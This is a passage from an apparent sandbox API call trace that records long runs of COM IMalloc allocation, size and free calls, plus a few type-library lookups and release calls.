pv=0xb4914b0) returned 0x10 [0031.205] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.205] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.205] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.205] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.205] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.205] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.206] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.206] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.207] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.207] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.208] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.208] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.208] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.208] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.208] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.208] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.208] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.208] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.209] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.209] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.209] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.209] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.209] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.209] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.209] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.209] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.209] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.209] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.209] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.209] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4914b0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x18 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.210] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.210] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.211] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.211] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.211] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.211] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.211] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.211] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.211] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.211] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.212] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.212] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.212] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.212] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.212] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.213] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.213] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.213] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.213] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.213] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.213] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914b0 [0031.213] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4914b0) returned 0x10 [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491a70) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491630) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4917b0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491290) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4919d0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491410) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491590) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4916d0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491890) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4913f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491790) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4915f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491490) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491990) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb490d90) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4915b0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491730) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491750) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4913b0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb490fd0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4916f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491610) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb490ff0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4918b0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491970) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4919b0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4914f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4913d0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491850) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb490f30) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4914d0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491830) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491690) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491050) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491070) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491950) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491450) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4918f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4919f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb490fb0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4918d0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb490e30) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491870) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491a10) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491010) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491770) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491430) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491ab0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491710) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491570) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb4917d0) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.214] IMalloc:Free (This=0x7fefe015380, pv=0xb491a50) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb491530) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc280) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76663c0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666390) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc2c0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666360) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc300) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666300) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc240) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76662d0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76662a0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666270) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666210) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76661e0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76661b0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666180) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666150) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76660f0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76663f0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666450) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666480) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76664b0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76664e0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666540) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666570) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc200) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76665a0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76665d0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666630) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666660) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc1c0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc180) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc140) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666690) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb4e5470) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0xb4e5740) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76666c0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76666f0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666750) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc100) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc0c0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc080) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc040) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666780) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76667b0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76667e0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dc000) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbfc0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbf80) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbf40) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666810) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666840) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbf00) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbec0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe80) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe40) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbe00) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc80) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76668a0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76668d0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc40) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbd40) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666900) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666930) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbbc0) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76dbc00) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666960) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x7666990) [0031.215] IMalloc:Free (This=0x7fefe015380, pv=0x76669f0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x76db7c0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x76dba00) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0xb4e56f0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0xb4e56a0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666a50) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666a80) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666ab0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666ae0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666b10) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666b70) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666ba0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb40) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666bd0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666c00) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666c60) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666c90) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666cc0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb80) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x76db480) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666cf0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.216] IMalloc:Free (This=0x7fefe015380, pv=0x7667680) [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7667680 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76db480 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x34) returned 0x76dbb80 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666f60 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7667020 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7667110 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666e70 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666de0 [0031.216] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666db0 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666d50 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666d20 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666cf0 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666cc0 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dbb40 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666c90 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666c60 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491470 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491530 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491370 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a50 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917d0 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491930 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491810 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491550 [0031.217] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.218] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.218] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.218] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.218] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.218] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x10 [0031.220] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5470 [0031.220] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5470) returned 0x48 [0031.224] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e5470 [0031.224] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5470) returned 0x48 [0031.224] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.224] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.224] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.224] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x10 [0031.225] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e5470 [0031.225] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e5470) returned 0x40 [0031.225] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491710 [0031.225] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x18 [0031.225] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.225] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x10 [0031.226] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb491710 [0031.226] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x18 [0031.226] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.226] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.226] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.226] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c00) returned 0x28 [0031.226] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.226] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c00) returned 0x28 [0031.227] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666c00 [0031.227] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666c00) returned 0x28 [0031.227] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.227] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x10 [0031.227] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76dba00 [0031.227] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dba00) returned 0x38 [0031.228] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.228] IMalloc:GetSize (This=0x7fefe015380, pv=0xb491710) returned 0x10 [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491470) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491930) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb4915d0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491570) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491530) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491650) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb4916b0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491a50) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491550) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491810) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb4917f0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb4917d0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491910) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491370) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb491a90) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7667680) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x76db480) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb80) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666f60) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7667020) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7667110) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666e70) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666de0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666db0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666d50) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666d20) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666cf0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666cc0) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x76dbb40) [0031.228] IMalloc:Free (This=0x7fefe015380, pv=0x7666c90) [0031.229] IMalloc:Free (This=0x7fefe015380, pv=0x7666c60) [0031.229] ITypeInfo:GetImplTypeFlags (in: This=0xb4cd220, index=0x0, pImplTypeFlags=0x2e6948 | out: pImplTypeFlags=0x2e6948*=1) returned 0x0 [0031.229] IUnknown:Release (This=0x780b168) returned 0x2 [0031.229] ITypeInfo:GetImplTypeFlags (in: This=0xb4cd220, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.229] IUnknown:Release (This=0x780b468) returned 0x2 [0031.229] IUnknown:Release (This=0xb4ccf08) returned 0x1 [0031.229] IUnknown:Release (This=0xb4cd170) returned 0x1 [0031.229] IUnknown:Release (This=0xb4cd220) returned 0x1 [0031.229] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x30, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd278) returned 0x0 [0031.229] IUnknown:Release 